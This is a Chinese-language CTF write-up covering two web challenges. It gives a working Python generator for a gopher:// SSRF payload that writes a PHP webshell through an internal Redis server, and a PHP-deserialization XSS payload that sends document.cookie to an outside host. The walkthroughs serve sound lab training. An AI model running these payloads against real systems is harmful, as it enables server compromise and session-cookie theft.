Redis和SSRF:https://xz.aliyun.com/t/1800
利用Gopher协议拓展攻击面:https://blog.chaitin.cn/gopher-attack-surfaces/
[GKCTF2020]EZ三剑客-EzWeb
首先访问?secret获取到本机ip信息
首页的搜索框存在文件包含,尝试file://协议发现被屏蔽了,尝试file:/协议发现可以,说明其过滤不严。于是直接读取file:/var/www/html/index.php获取源码
<?php
function curl($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
echo curl_exec($ch);
curl_close($ch);
}
if(isset($_GET['submit'])){
$url = $_GET['url'];
//echo $url."\n";
if(preg_match('/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is', $url,$match))
{
//var_dump($match);
die('别这样');
}
curl($url);
}
if(isset($_GET['secret'])){
system('ifconfig');
}
?>
结合前面获得到的本机ip,或许flag存在内网的其他主机内,使用BurpSuite可以扫描一下内网的主机。结果发现是在.11的主机上,且有提示需要找某个端口下的服务。于是继续用burp扫端口,发现了有Redis的6379端口。由于运行在内网下的Redis服务很有可能是root权限的,于是尝试写入shell。这里使用Gopher协议,将redis协议转换为gopher格式的脚本:
from urllib import parse
protocol="gopher://"
ip="173.118.207.11" # 运行有redis的主机ip
port="6379"
shell="\n\n<?php system(\"cat /flag\");?>\n\n"
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
"set 1 {}".format(shell.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
CRLF="\r\n"
redis_arr = arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
cmd+=CRLF
return cmd
if __name__=="__main__":
for x in cmd:
payload += parse.quote(redis_format(x))
print (payload)
最后访问内网运行Redis的靶机的shell.php即可。
[BJDCTF 2nd]xss之光
首先访问/.git/发现git泄露,hack下来以后得到源码:
<?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a);
https://www.cnblogs.com/iamstudy/articles/unserialize_in_php_inner_class.html#_label2
因为有一个echo,所以考虑的是__toString()原生类反序列化。由于flag存储在cookie中,所以直接获取document.cookie即可:
<?php
$a = new Exception('"<script>window.open(\'http://www.baidu.com/?\'+document.cookie);</script>');
echo urlencode(serialize($a));
Comments | NOTHING